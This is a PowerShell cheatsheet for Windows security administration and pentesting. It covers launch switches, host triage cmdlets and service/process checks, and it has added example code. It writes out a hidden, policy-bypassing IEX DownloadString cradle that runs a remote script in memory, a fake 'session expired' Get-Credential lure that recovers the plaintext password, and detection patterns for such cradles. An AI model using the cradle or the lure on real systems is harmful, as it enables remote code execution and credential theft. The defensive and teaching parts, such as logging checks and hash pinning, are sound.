title: PowerShell for Windows (Security) Administration categories: [cheatsheets]
1) powershell.exe parameters (every switch may be shortened to any unique prefix, which is why the short forms below work):
-ExecutionPolicy Bypass (-Exec Bypass, -ep Bypass) // ignores the execution policy for this process so .ps1 files run; the policy is a safety rail for the user, not a security boundary, and this switch is itself a common detection signature
-NoProfile (-NoP) // does not load $PROFILE scripts, so the session starts in a clean, predictable environment and the user's profile cannot interfere
-NonInteractive (-NonI) // no interactive prompt; anything that would wait for input fails instead of blocking
-WindowStyle Hidden (-W Hidden) // hides the console window (it still flashes briefly when launched from an interactive session)
-NoExit // keeps the shell open after the command finishes (useful for keyloggers and other long-running scripts)
-Command // executes the given command string; when launched from cmd.exe, quote the whole string
2) Use PowerShell to get information about the system
Get-HotFix // lists installed Windows updates (HotFixID, InstalledOn); an old InstalledOn date on the newest entry points to missing patches
Get-Service // lists all services with their status; it does not show the binary path or the account a service runs as
Get-Process // lists all processes; -IncludeUserName (needs elevation) adds the owning account
Get-Credential // pops the standard Windows credential prompt; the password typed in can be read back in plain text from the returned object, which makes it a convenient social-engineering lure
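The cmdlets above combined into a quick host triage, as an added example (not code from the original cheatsheet). It assumes Windows PowerShell 5.1 or later run from an elevated prompt; the prompt text in the Get-Credential part is made up for illustration.

```powershell
# Added example, not part of the original cheatsheet. Assumes PowerShell 5.1+
# on Windows, run elevated (Get-Process -IncludeUserName needs it).

# 1) Patch level: newest hotfix and how long ago it was installed.
$hotfixes = Get-HotFix | Where-Object { $_.InstalledOn } | Sort-Object InstalledOn -Descending
$latest   = $hotfixes | Select-Object -First 1
"Latest hotfix: {0} installed {1:yyyy-MM-dd} ({2} days ago)" -f `
    $latest.HotFixID, $latest.InstalledOn, ((Get-Date) - $latest.InstalledOn).Days

# 2) Services: running services whose binary is not signed by Microsoft.
# Get-Service carries no path information, so Win32_Service is queried for it.
Get-CimInstance Win32_Service -Filter "State='Running'" | ForEach-Object {
    $path = $_.PathName
    # Strip surrounding quotes and arguments to isolate the executable path,
    # then expand %SystemRoot%-style variables that some services use.
    $exe = if ($path -match '^"([^"]+)"') { $Matches[1] } else { ($path -split ' ')[0] }
    $exe = [Environment]::ExpandEnvironmentVariables($exe)
    $sig = Get-AuthenticodeSignature -FilePath $exe -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Name      = $_.Name
        RunsAs    = $_.StartName
        Path      = $exe
        Signer    = $sig.SignerCertificate.Subject
        SigStatus = $sig.Status
    }
} | Where-Object { $_.Signer -notlike '*Microsoft*' } | Format-Table -AutoSize

# 3) Processes with owner and image path, filtered to binaries living outside
# the usual system and program directories (a cheap first look for oddities).
Get-Process -IncludeUserName | Select-Object Id, ProcessName, UserName, Path |
    Where-Object {
        $_.Path -and
        $_.Path -notlike "$env:SystemRoot*" -and
        $_.Path -notlike "$env:ProgramFiles*"
    } | Format-Table -AutoSize

# 4) Get-Credential shows the standard Windows credential dialog. The typed
# password is recoverable from the PSCredential object, which is exactly why
# a prompt appearing out of nowhere should be treated as a red flag.
$cred  = Get-Credential -UserName "$env:USERDOMAIN\$env:USERNAME" `
                        -Message 'Session expired, please re-authenticate'   # hypothetical lure text
$plain = $cred.GetNetworkCredential().Password
"Captured a {0}-character password for {1}" -f $plain.Length, $cred.UserName
```

The service check deliberately flags unsigned or non-Microsoft binaries rather than trying to decide what is malicious; the list is short enough on a typical host to review by hand.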
3) Load a script from a web server and execute it inline, in memory (nothing is written to disk)
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://URL/script.ps1')"
Important:
-> In memory is not invisible: with script block logging enabled, the downloaded script text is recorded in the PowerShell operational log (event 4104), and AMSI scans it before it runs.
-> Never run unreviewed code from the internet on a client's system!
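The cradle from section 3 with two practitioner additions, as an added example (not code from the original cheatsheet): the fetched script is only executed if its SHA-256 matches a hash pinned after reviewing it, and a second function reads the PowerShell operational log to show that an in-memory load still leaves a record when script block logging is enabled. The URL and hash in the usage line are placeholders; the function names are my own.

```powershell
# Added example, not part of the original cheatsheet. Assumes Windows PowerShell 5.1+.

function Invoke-PinnedRemoteScript {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$ExpectedSha256   # hex, taken from your own review of the script
    )
    # Same primitive as the cheatsheet cradle. TLS 1.2 and the system proxy are
    # set explicitly because the .NET defaults on older hosts fail on many networks.
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
    $wc = New-Object Net.WebClient
    $wc.Proxy = [Net.WebRequest]::GetSystemWebProxy()
    $wc.Proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
    $code = $wc.DownloadString($Url)

    # Hash the text exactly as it will be executed (UTF-8 bytes of the string).
    $bytes = [Text.Encoding]::UTF8.GetBytes($code)
    $sha   = [Security.Cryptography.SHA256]::Create()
    $hash  = ($sha.ComputeHash($bytes) | ForEach-Object { $_.ToString('x2') }) -join ''

    if ($hash -ne $ExpectedSha256.ToLower()) {
        throw "Refusing to run $Url : SHA-256 $hash does not match pinned $ExpectedSha256"
    }
    Invoke-Expression $code
}

# Usage (placeholder URL and hash; pin the hash only after reading the script):
# Invoke-PinnedRemoteScript -Url 'http://URL/script.ps1' -ExpectedSha256 '<sha256 of reviewed script>'

# Defender side: with script block logging enabled, the content of every
# executed script block, including one pulled with DownloadString, lands in
# Microsoft-Windows-PowerShell/Operational as event 4104. This scans the most
# recent entries for typical cradle keywords.
function Get-DownloadCradleEvents {
    param([int]$Scan = 200)   # how many of the newest 4104 events to look at
    Get-WinEvent -FilterHashtable @{
            LogName = 'Microsoft-Windows-PowerShell/Operational'
            Id      = 4104
        } -MaxEvents $Scan -ErrorAction SilentlyContinue |
        Where-Object { "$($_.Message)" -match 'DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b' } |
        Select-Object TimeCreated, Id,
            @{ n = 'Snippet'; e = { "$($_.Message)".Substring(0, [Math]::Min(120, "$($_.Message)".Length)) } }
}
```

The hash check protects against the hosted script changing between your review and its execution; it does nothing for a script you never reviewed, which is the point of the warning above. Get-DownloadCradleEvents returns nothing if script block logging is off, which is itself worth knowing about a host.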
4) Some PowerShell scripts for pentesters